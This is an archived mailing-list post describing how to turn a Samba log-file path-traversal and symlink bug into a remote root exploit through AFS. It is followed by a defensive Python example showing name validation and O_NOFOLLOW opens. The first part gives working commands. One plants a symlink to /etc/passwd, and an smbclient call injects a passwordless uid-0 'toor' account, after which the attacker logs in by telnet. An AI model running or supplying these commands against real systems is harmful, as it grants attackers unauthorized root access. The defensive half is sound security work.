I was hoping to test this out but haven't been able to, so here goes on theoretical... How to make this exploit a remote one using AFS or other remote file systems. What does this exploit need on the remote side? A symlink; so... on an AFS system, preferably one of a well known node that most AFS servers would have in their CellServDB such as andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named x.log like

    ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log

now make the symlink world readable... then all you need is UNIXes running samba in the vulnerable configuration and running AFS.

    smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
        -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
    telnet afs.machine

login as toor. If root logins aren't allowed, make a dummy account first, login with that, then make a toor account on top of that and su over to toor.

What machines does this really affect? Those running samba and AFS, mainly educational institutions or other large institutions.

Christopher Palow
palowat_private
Senior Electrical and Computer Engineering
Carnegie Mellon University
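The post relies on two server-side weaknesses: the client-supplied NetBIOS name (the `-n` argument) is used as part of a log file path without being checked for `..` traversal, and the log file is then opened without regard to whether it is a symlink, so a pre-planted link redirects the write. The following is an added example, not code from the post or from Samba, showing the two checks a defender would want in any daemon that derives a file name from untrusted client input: a strict name policy plus a containment check, and an open that refuses to follow a symlink at the leaf. `LOG_DIR`, `validate_client_name`, `log_path_for`, `open_log` and the `log.<name>` naming are assumptions made for the example.

```python
import os
import re

# Assumed log location for the example; adjust for your install.
LOG_DIR = "/var/log/samba"

# Only the characters a legitimate NetBIOS name would carry (no '/', '\\').
_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,15}$")


def validate_client_name(name: str) -> bool:
    """Return True only if name is safe to embed in a log file name."""
    if not _NAME_RE.match(name):
        return False
    # "." and ".." pass the character set but are traversal components.
    if set(name) == {"."}:
        return False
    return True


def log_path_for(name: str, log_dir: str = LOG_DIR) -> str:
    """Build log.<name> under log_dir, raising ValueError on unsafe input.

    The containment check is a second line of defence: even if the name
    policy were loosened, a normalized path whose parent is not log_dir
    is rejected, which is exactly what a '../../../afs/...' name would do.
    """
    if not validate_client_name(name):
        raise ValueError("unsafe client name: %r" % name)
    candidate = os.path.normpath(os.path.join(log_dir, "log." + name))
    base = os.path.normpath(log_dir)
    if os.path.dirname(candidate) != base:
        raise ValueError("path escapes log directory: %r" % candidate)
    return candidate


def open_log(name: str, log_dir: str = LOG_DIR):
    """Open the per-client log for append without following a leaf symlink.

    With O_NOFOLLOW, open() fails with ELOOP when log.<name> is a symlink,
    so a link planted ahead of time cannot redirect the write to a file
    such as /etc/passwd.
    """
    path = log_path_for(name, log_dir)
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o640)
    return os.fdopen(fd, "a")


def symlink_write_is_refused() -> bool:
    """Self-check: plant log.x as a symlink in a temp dir and confirm that
    open_log() refuses it, leaving the link target untouched."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "victim.txt")  # constructed stand-in target
        with open(target, "w") as f:
            f.write("original\n")
        os.symlink(target, os.path.join(tmp, "log.x"))
        try:
            with open_log("x", tmp) as f:
                f.write("injected\n")
        except OSError:
            pass  # expected: ELOOP from O_NOFOLLOW
        with open(target) as f:
            return f.read() == "original\n"


if __name__ == "__main__":
    print("traversal name accepted:", validate_client_name("../../../afs/x"))
    print("symlink write refused:", symlink_write_is_refused())
```

The name policy alone would stop the post's `-n ../../../afs/...` argument; the `O_NOFOLLOW` open is what matters when the log directory itself is writable by other users (or lives on a shared filesystem like AFS), because then the symlink can be planted right where the daemon expects its file.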
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 14:23:11 PDT